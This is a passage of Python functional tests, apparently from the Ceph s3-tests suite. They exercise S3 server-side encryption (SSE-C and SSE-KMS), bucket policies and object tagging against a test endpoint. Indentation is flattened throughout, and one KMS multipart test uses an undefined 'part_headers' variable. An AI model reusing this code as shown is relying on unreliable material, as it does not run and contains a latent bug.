eq(rgw_bytes_used, objlen)
lf = (lambda **kwargs: kwargs['params']['headers'].update(enc_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['Metadata'], metadata)
eq(response['ResponseMetadata']['HTTPHeaders']['content-type'], content_type)
body = _get_body(response)
eq(body, data)
size = response['ContentLength']
eq(len(body), size)
_check_content_using_range_enc(client, bucket_name, key, data, 1000000, enc_headers=enc_headers)
_check_content_using_range_enc(client, bucket_name, key, data, 10000000, enc_headers=enc_headers)
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart upload with bad key for uploading chunks')
@attr(assertion='successful')
@attr('encryption')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_encryption_sse_c_multipart_invalid_chunks_1():
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
init_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw==',
'Content-Type': content_type
}
part_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': '6b+WOZ1T3cqZMxgThRcXAQBrS5mXKdDUphvpxptl9/4=',
'x-amz-server-side-encryption-customer-key-md5': 'arxBvwY2V4SiOne6yppVPQ=='
}
resend_parts = []
e = assert_raises(ClientError, _multipart_upload_enc, client=client, bucket_name=bucket_name,
key=key, size=objlen, part_size=5*1024*1024, init_headers=init_headers, part_headers=part_headers, metadata=metadata, resend_parts=resend_parts)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart upload with bad md5 for chunks')
@attr(assertion='successful')
@attr('encryption')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_encryption_sse_c_multipart_invalid_chunks_2():
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
init_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw==',
'Content-Type': content_type
}
part_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'AAAAAAAAAAAAAAAAAAAAAA=='
}
resend_parts = []
e = assert_raises(ClientError, _multipart_upload_enc, client=client, bucket_name=bucket_name,
key=key, size=objlen, part_size=5*1024*1024, init_headers=init_headers, part_headers=part_headers, metadata=metadata, resend_parts=resend_parts)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multi-part upload and download with bad key')
@attr(assertion='successful')
@attr('encryption')
def test_encryption_sse_c_multipart_bad_download():
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
put_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw==',
'Content-Type': content_type
}
get_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': '6b+WOZ1T3cqZMxgThRcXAQBrS5mXKdDUphvpxptl9/4=',
'x-amz-server-side-encryption-customer-key-md5': 'arxBvwY2V4SiOne6yppVPQ=='
}
resend_parts = []
(upload_id, data, parts) = _multipart_upload_enc(client, bucket_name, key, objlen,
part_size=5*1024*1024, init_headers=put_headers, part_headers=put_headers, metadata=metadata, resend_parts=resend_parts)
lf = (lambda **kwargs: kwargs['params']['headers'].update(put_headers))
client.meta.events.register('before-call.s3.CompleteMultipartUpload', lf)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.head_bucket(Bucket=bucket_name)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 1))
eq(rgw_object_count, 1)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', objlen))
eq(rgw_bytes_used, objlen)
lf = (lambda **kwargs: kwargs['params']['headers'].update(put_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['Metadata'], metadata)
eq(response['ResponseMetadata']['HTTPHeaders']['content-type'], content_type)
lf = (lambda **kwargs: kwargs['params']['headers'].update(get_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
@attr('encryption')
def test_encryption_sse_c_post_object_authenticated_request():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["starts-with", "$x-amz-server-side-encryption-customer-algorithm", ""], \
["starts-with", "$x-amz-server-side-encryption-customer-key", ""], \
["starts-with", "$x-amz-server-side-encryption-customer-key-md5", ""], \
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),
('x-amz-server-side-encryption-customer-algorithm', 'AES256'), \
('x-amz-server-side-encryption-customer-key', 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs='), \
('x-amz-server-side-encryption-customer-key-md5', 'DWygnHRtgiJ77HCm+1rvHw=='), \
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
get_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(get_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(assertion='success')
@attr('encryption')
def _test_sse_kms_customer_write(file_size, key_id = 'testkey-1'):
"""
Tests Create a file of A's, use it to set_contents_from_file.
Create a file of B's, use it to re-set_contents_from_file.
Re-read the contents, and confirm we get B's
"""
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': key_id
}
data = 'A'*file_size
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key='testobj', Body=data)
response = client.get_object(Bucket=bucket_name, Key='testobj')
body = _get_body(response)
eq(body, data)
@attr(resource='object')
@attr(method='head')
@attr(operation='Test SSE-KMS encrypted does perform head properly')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_method_head():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid
}
data = 'A'*1000
key = 'testobj'
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPHeaders']['x-amz-server-side-encryption'], 'aws:kms')
eq(response['ResponseMetadata']['HTTPHeaders']['x-amz-server-side-encryption-aws-kms-key-id'], kms_keyid)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.HeadObject', lf)
e = assert_raises(ClientError, client.head_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-KMS and read without SSE-KMS')
@attr(assertion='operation success')
@attr('encryption')
def test_sse_kms_present():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid
}
data = 'A'*100
key = 'testobj'
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, data)
@attr(resource='object')
@attr(method='put')
@attr(operation='declare SSE-KMS but do not provide key_id')
@attr(assertion='operation fails')
@attr('encryption')
def test_sse_kms_no_key():
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
}
data = 'A'*100
key = 'testobj'
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
@attr(resource='object')
@attr(method='put')
@attr(operation='Do not declare SSE-KMS but provide key_id')
@attr(assertion='operation successfull, no encryption')
@attr('encryption')
def test_sse_kms_not_declared():
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption-aws-kms-key-id': 'testkey-2'
}
data = 'A'*100
key = 'testobj'
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='complete KMS multi-part upload')
@attr(assertion='successful')
@attr('encryption')
def test_sse_kms_multipart_upload():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
enc_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid,
'Content-Type': content_type
}
resend_parts = []
(upload_id, data, parts) = _multipart_upload_enc(client, bucket_name, key, objlen,
part_size=5*1024*1024, init_headers=enc_headers, part_headers=enc_headers, metadata=metadata, resend_parts=resend_parts)
lf = (lambda **kwargs: kwargs['params']['headers'].update(enc_headers))
client.meta.events.register('before-call.s3.CompleteMultipartUpload', lf)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.head_bucket(Bucket=bucket_name)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 1))
eq(rgw_object_count, 1)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', objlen))
eq(rgw_bytes_used, objlen)
lf = (lambda **kwargs: kwargs['params']['headers'].update(part_headers))
client.meta.events.register('before-call.s3.UploadPart', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['Metadata'], metadata)
eq(response['ResponseMetadata']['HTTPHeaders']['content-type'], content_type)
body = _get_body(response)
eq(body, data)
size = response['ContentLength']
eq(len(body), size)
_check_content_using_range(key, bucket_name, data, 1000000)
_check_content_using_range(key, bucket_name, data, 10000000)
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart KMS upload with bad key_id for uploading chunks')
@attr(assertion='successful')
@attr('encryption')
def test_sse_kms_multipart_invalid_chunks_1():
kms_keyid = get_main_kms_keyid()
kms_keyid2 = get_secondary_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/bla'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
init_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid,
'Content-Type': content_type
}
part_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid2
}
resend_parts = []
_multipart_upload_enc(client, bucket_name, key, objlen, part_size=5*1024*1024,
init_headers=init_headers, part_headers=part_headers, metadata=metadata,
resend_parts=resend_parts)
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart KMS upload with unexistent key_id for chunks')
@attr(assertion='successful')
@attr('encryption')
def test_sse_kms_multipart_invalid_chunks_2():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
init_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': kms_keyid,
'Content-Type': content_type
}
part_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': 'testkey-not-present'
}
resend_parts = []
_multipart_upload_enc(client, bucket_name, key, objlen, part_size=5*1024*1024,
init_headers=init_headers, part_headers=part_headers, metadata=metadata,
resend_parts=resend_parts)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated KMS browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
@attr('encryption')
def test_sse_kms_post_object_authenticated_request():
kms_keyid = get_main_kms_keyid()
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["starts-with", "$x-amz-server-side-encryption", ""], \
["starts-with", "$x-amz-server-side-encryption-aws-kms-key-id", ""], \
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),
('x-amz-server-side-encryption', 'aws:kms'), \
('x-amz-server-side-encryption-aws-kms-key-id', kms_keyid), \
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-KMS encrypted transfer 1 byte')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_transfer_1b():
kms_keyid = get_main_kms_keyid()
if kms_keyid is None:
raise SkipTest
_test_sse_kms_customer_write(1, key_id = kms_keyid)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-KMS encrypted transfer 1KB')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_transfer_1kb():
kms_keyid = get_main_kms_keyid()
if kms_keyid is None:
raise SkipTest
_test_sse_kms_customer_write(1024, key_id = kms_keyid)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-KMS encrypted transfer 1MB')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_transfer_1MB():
kms_keyid = get_main_kms_keyid()
if kms_keyid is None:
raise SkipTest
_test_sse_kms_customer_write(1024*1024, key_id = kms_keyid)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-KMS encrypted transfer 13 bytes')
@attr(assertion='success')
@attr('encryption')
def test_sse_kms_transfer_13b():
kms_keyid = get_main_kms_keyid()
if kms_keyid is None:
raise SkipTest
_test_sse_kms_customer_write(13, key_id = kms_keyid)
@attr(resource='object')
@attr(method='get')
@attr(operation='write encrypted with SSE-KMS and read with SSE-KMS')
@attr(assertion='operation fails')
@attr('encryption')
def test_sse_kms_read_declare():
bucket_name = get_new_bucket()
client = get_client()
sse_kms_client_headers = {
'x-amz-server-side-encryption': 'aws:kms',
'x-amz-server-side-encryption-aws-kms-key-id': 'testkey-1'
}
data = 'A'*100
key = 'testobj'
client.put_object(Bucket=bucket_name, Key=key, Body=data)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_kms_client_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy')
@attr(assertion='succeeds')
@attr('bucket-policy')
def test_bucket_policy():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
response = alt_client.list_objects(Bucket=bucket_name)
eq(len(response['Contents']), 1)
@attr('bucket-policy')
@attr('list-objects-v2')
def test_bucketv2_policy():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
response = alt_client.list_objects_v2(Bucket=bucket_name)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy and ACL')
@attr(assertion='fails')
@attr('bucket-policy')
def test_bucket_policy_acl():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Deny",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_acl(Bucket=bucket_name, ACL='authenticated-read')
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
e = assert_raises(ClientError, alt_client.list_objects, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
client.delete_bucket_policy(Bucket=bucket_name)
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy and ACL with list-objects-v2')
@attr(assertion='fails')
@attr('bucket-policy')
@attr('list-objects-v2')
def test_bucketv2_policy_acl():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3:::" + bucket_name
resource2 = "arn:aws:s3:::" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Deny",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_acl(Bucket=bucket_name, ACL='authenticated-read')
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
alt_client = get_alt_client()
e = assert_raises(ClientError, alt_client.list_objects_v2, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
client.delete_bucket_policy(Bucket=bucket_name)
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy for a user belonging to a different tenant')
@attr(assertion='succeeds')
@attr('bucket-policy')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_policy_different_tenant():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3::*:" + bucket_name
resource2 = "arn:aws:s3::*:" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
# TODO: figure out how to change the bucketname
def change_bucket_name(**kwargs):
kwargs['params']['url'] = "http://localhost:8000/:{bucket_name}?encoding-type=url".format(bucket_name=bucket_name)
kwargs['params']['url_path'] = "/:{bucket_name}".format(bucket_name=bucket_name)
kwargs['params']['context']['signing']['bucket'] = ":{bucket_name}".format(bucket_name=bucket_name)
print(kwargs['request_signer'])
print(kwargs)
#bucket_name = ":" + bucket_name
tenant_client = get_tenant_client()
tenant_client.meta.events.register('before-call.s3.ListObjects', change_bucket_name)
response = tenant_client.list_objects(Bucket=bucket_name)
#alt_client = get_alt_client()
#response = alt_client.list_objects(Bucket=bucket_name)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy for a user belonging to a different tenant')
@attr(assertion='succeeds')
@attr('bucket-policy')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
@attr('list-objects-v2')
def test_bucketv2_policy_different_tenant():
bucket_name = get_new_bucket()
client = get_client()
key = 'asdf'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
resource1 = "arn:aws:s3::*:" + bucket_name
resource2 = "arn:aws:s3::*:" + bucket_name + "/*"
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"{}".format(resource1),
"{}".format(resource2)
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
# TODO: figure out how to change the bucketname
def change_bucket_name(**kwargs):
kwargs['params']['url'] = "http://localhost:8000/:{bucket_name}?encoding-type=url".format(bucket_name=bucket_name)
kwargs['params']['url_path'] = "/:{bucket_name}".format(bucket_name=bucket_name)
kwargs['params']['context']['signing']['bucket'] = ":{bucket_name}".format(bucket_name=bucket_name)
print(kwargs['request_signer'])
print(kwargs)
#bucket_name = ":" + bucket_name
tenant_client = get_tenant_client()
tenant_client.meta.events.register('before-call.s3.ListObjects', change_bucket_name)
response = tenant_client.list_objects_v2(Bucket=bucket_name)
#alt_client = get_alt_client()
#response = alt_client.list_objects_v2(Bucket=bucket_name)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy on another bucket')
@attr(assertion='succeeds')
@attr('bucket-policy')
def test_bucket_policy_another_bucket():
bucket_name = get_new_bucket()
bucket_name2 = get_new_bucket()
client = get_client()
key = 'asdf'
key2 = 'abcd'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
client.put_object(Bucket=bucket_name2, Key=key2, Body='abcd')
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"arn:aws:s3:::*",
"arn:aws:s3:::*/*"
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
response = client.get_bucket_policy(Bucket=bucket_name)
response_policy = response['Policy']
client.put_bucket_policy(Bucket=bucket_name2, Policy=response_policy)
alt_client = get_alt_client()
response = alt_client.list_objects(Bucket=bucket_name)
eq(len(response['Contents']), 1)
alt_client = get_alt_client()
response = alt_client.list_objects(Bucket=bucket_name2)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test Bucket Policy on another bucket with list-objects-v2')
@attr(assertion='succeeds')
@attr('bucket-policy')
@attr('list-objects-v2')
def test_bucketv2_policy_another_bucket():
bucket_name = get_new_bucket()
bucket_name2 = get_new_bucket()
client = get_client()
key = 'asdf'
key2 = 'abcd'
client.put_object(Bucket=bucket_name, Key=key, Body='asdf')
client.put_object(Bucket=bucket_name2, Key=key2, Body='abcd')
policy_document = json.dumps(
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": [
"arn:aws:s3:::*",
"arn:aws:s3:::*/*"
]
}]
})
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
response = client.get_bucket_policy(Bucket=bucket_name)
response_policy = response['Policy']
client.put_bucket_policy(Bucket=bucket_name2, Policy=response_policy)
alt_client = get_alt_client()
response = alt_client.list_objects_v2(Bucket=bucket_name)
eq(len(response['Contents']), 1)
alt_client = get_alt_client()
response = alt_client.list_objects_v2(Bucket=bucket_name2)
eq(len(response['Contents']), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put condition operator end with ifExists')
@attr('bucket-policy')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_policy_set_condition_operator_end_with_IfExists():
bucket_name = get_new_bucket()
client = get_client()
key = 'foo'
client.put_object(Bucket=bucket_name, Key=key)
policy = '''{
"Version":"2012-10-17",
"Statement": [{
"Sid": "Allow Public Access to All Objects",
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Condition": {
"StringLikeIfExists": {
"aws:Referer": "http://www.example.com/*"
}
},
"Resource": "arn:aws:s3:::%s/*"
}
]
}''' % bucket_name
boto3.set_stream_logger(name='botocore')
client.put_bucket_policy(Bucket=bucket_name, Policy=policy)
request_headers={'referer': 'http://www.example.com/'}
lf = (lambda **kwargs: kwargs['params']['headers'].update(request_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
request_headers={'referer': 'http://www.example.com/index.html'}
lf = (lambda **kwargs: kwargs['params']['headers'].update(request_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# the 'referer' headers need to be removed for this one
#response = client.get_object(Bucket=bucket_name, Key=key)
#eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
request_headers={'referer': 'http://example.com'}
lf = (lambda **kwargs: kwargs['params']['headers'].update(request_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
# TODO: Compare Requests sent in Boto3, Wireshark, RGW Log for both boto and boto3
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
response = client.get_bucket_policy(Bucket=bucket_name)
print(response)
def _create_simple_tagset(count):
tagset = []
for i in range(count):
tagset.append({'Key': str(i), 'Value': str(i)})
return {'TagSet': tagset}
def _make_random_string(size):
return ''.join(random.choice(string.ascii_letters) for _ in range(size))
@attr(resource='object')
@attr(method='get')
@attr(operation='Test Get/PutObjTagging output')
@attr(assertion='success')
@attr('tagging')
def test_get_obj_tagging():
key = 'testputtags'
bucket_name = _create_key_with_random_content(key)
client = get_client()
input_tagset = _create_simple_tagset(2)
response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_object_tagging(Bucket=bucket_name, Key=key)
eq(response['TagSet'], input_tagset['TagSet'])
@attr(resource='object')
@attr(method='get')
@attr(operation='Test HEAD obj tagging output')
@attr(assertion='success')
@attr('tagging')
def test_get_obj_head_tagging():
key = 'testputtags'
